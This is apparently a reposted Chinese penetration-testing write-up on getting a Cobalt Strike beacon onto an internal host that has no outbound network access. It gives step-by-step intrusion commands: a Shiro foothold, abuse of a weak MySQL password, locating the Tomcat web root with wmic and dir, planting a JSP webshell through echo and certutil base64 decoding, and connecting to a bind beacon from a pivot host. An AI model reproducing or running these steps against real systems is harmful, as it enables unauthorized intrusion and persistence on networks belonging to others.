一次不出网上线cs实战案例

chenqiang

原文链接：一次不出网上线cs实战案例

​
场景
shiro打点获取10段服务器权限，在10段机器出网且已上线cs；172段不出网且反向不通10段，已通过mysql弱口令获取system权限，存在web服务。
上线过程
思路：写入webshell，通过正向马上线cs。
getshell
通过web服务获取一个web目录下的文件名：stf-login-bg.jpg

​

获取所有盘符

1. <code class="hljs">wmic logicaldisk get caption,name</code>

复制代码

​

通过文件名获取web目录

1. <code class="hljs">dir /a /s /b d:"stf-login-bg.jpg"</code>

复制代码

​

根据图片URL确定D:\apache-tomcat-7.0.73-windows-x64\apache-tomcat-7.0.73\webapps\ROOT\static\images\login\stf-login-bg.jpg为真实web路径，使用\可dir到此路径。

​

echo配合certutil写入webshell：

1. 
   
2. //base64编码shell.jsp
   
3. certutil -encode shell.jsp jsp.txt
   
4. 
   
5. //echo编码后的内容到web目录
   
6. echo xxxx >D:\\apache-tomcat-7.0.73-windows-x64\\apache-tomcat-7.0.73\\webapps\\ROOT\\static\\images\\login\\12.txt
   
7. 
   
8. //解码还原文件
   
9. certutil -decode D:\\apache-tomcat-7.0.73-windows-x64\\apache-tomcat-7.0.73\\webapps\\ROOT\\static\\images\\login\\12.txt D:\\apache-tomcat-7.0.73-windows-x64\\apache-tomcat-7.0.73\\webapps\\ROOT\\static\\images\\login\\123.jsp

复制代码

​

​

上线cs
新建监听器

​

生成正向马

​

​

通过webshell上传到目标机器并执行，使用跳板机连接，上线cs。

1. <code class="hljs">connect 172.20.57.122 28888</code>

复制代码

​

​